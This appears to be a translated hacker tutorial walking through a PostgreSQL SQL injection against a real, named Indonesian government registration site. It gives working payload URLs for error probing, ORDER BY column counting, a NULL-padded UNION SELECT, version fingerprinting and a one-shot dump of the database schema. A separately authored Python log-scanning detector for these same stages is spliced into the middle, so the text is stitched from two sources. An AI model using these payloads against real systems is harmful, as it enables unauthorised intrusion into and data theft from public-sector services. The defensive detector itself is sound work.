PostgreSQL SQL Injection Tutorial


Assalamualaikum guys, it's me again, Danzz

Okay, here I'm going to give a tutorial on Postgres SQL injection, so let's get straight to it...

For the target: https://registrasi.magetan.go.id/zproject.php/account/email?satker=11

First of all we check whether the site is vulnerable or not by adding a (')

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'

Now it errors, and the message says it's Postgres. Okay, on to the order by

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+1--+-

Now the page is back to normal, and we find out at which column number it starts to error

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+10--+- ~> fine

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+30--+- ~> fine

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+60--+- ~> error

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+59--+- ~> fine

Okay, so the columns only go up to 59. Let's move on to union select

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59--+-

Huh, why an error? That means we can't use plain numbers like this, so we swap them for NULL

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11%27+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-

Now it works, so we just check the NULLs one by one with version()

Here I got it at the 34th NULL

https://registrasi.magetan.go.id/zproject.php/account/email?satker=-11%27+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-

Now we just drop in the DIOS (dump-in-one-shot) query

And boom, the db gets dumped....

https://registrasi.magetan.go.id/zproject.php/account/email?satker=-11%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT+ARRAY_TO_STRING(ARRAY_AGG(concat(table_name,%27%3C~DanzzHaxor~%3E%27,column_name)::TEXT),$$%3Cli%3E$$)FROM+information_schema.columns+WHERE+table_schema+NOT+in($$informatio%E2%80%8Bn_schema$$,$$pg_catalog$$)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-
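From the defender's side, each of the three stages above (the quote break with ORDER BY probing, the NULL-padded UNION, and the information_schema dump) leaves a distinctive trace in the web-server access log. The following added example is my own and not part of the original post: it scans constructed Apache-style log lines with placeholder addresses, URL-decoding them twice and stripping the zero-width character that the DIOS payload hides inside "information_schema" before matching.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Characters an attacker can slip into keywords to defeat naive string matching;
# the DIOS payload above hides a zero-width space (%E2%80%8B) in "information_schema".
ZERO_WIDTH = re.compile("[\u200b\u200c\u200d\ufeff]")

# Signatures for the three stages of the walkthrough, matched against a
# normalised (decoded, lower-cased, whitespace-folded) query string.
SIGNATURES = {
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+\s*--"),
    "union_null_pad": re.compile(r"union\s+all\s+select\s+(?:null\s*,\s*){5,}"),
    "schema_dump": re.compile(r"information_schema|pg_catalog|array_agg\s*\(|version\s*\("),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # combined-format request field

def normalise(query: str) -> str:
    """Decode twice (catches double-encoded payloads), drop zero-width chars, fold case/space."""
    text = unquote_plus(unquote_plus(query))
    text = ZERO_WIDTH.sub("", text)
    return re.sub(r"\s+", " ", text).lower()

def scan_request(request_target: str) -> list[str]:
    """Return the names of all signatures that fire on the request's query string."""
    text = normalise(urlsplit(request_target).query)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """(line number, signature names) for every log line carrying a suspicious query."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        hits = scan_request(m.group(1)) if m else []
        if hits:
            findings.append((lineno, hits))
    return findings

# Constructed sample access log (placeholder IP and timestamps); the query strings follow
# the shape of the stages above: baseline request, ORDER BY probe, NULL padding, DIOS.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0700] "GET /zproject.php/account/email?satker=11 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0700] "GET /zproject.php/account/email?satker=11\'+order+by+59--+- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0700] "GET /zproject.php/account/email?satker=11%27+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:15 +0700] "GET /zproject.php/account/email?satker=-11%27%20UNION%20ALL%20SELECT%20NULL,(SELECT+ARRAY_TO_STRING(ARRAY_AGG(table_name::TEXT),$$%3Cli%3E$$)FROM+information_schema.columns+WHERE+table_schema+NOT+in($$informatio%E2%80%8Bn_schema$$)),NULL--+- HTTP/1.1" 200 9800',
]

if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

Matching on the normalised query rather than the raw log text is what makes the `+`, `%20`, `%27` and zero-width variants above collapse into one signature each.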

Okay, that's the end of my Postgres SQL injection tutorial. I hope you understood the explanation

Wassalamualaikum...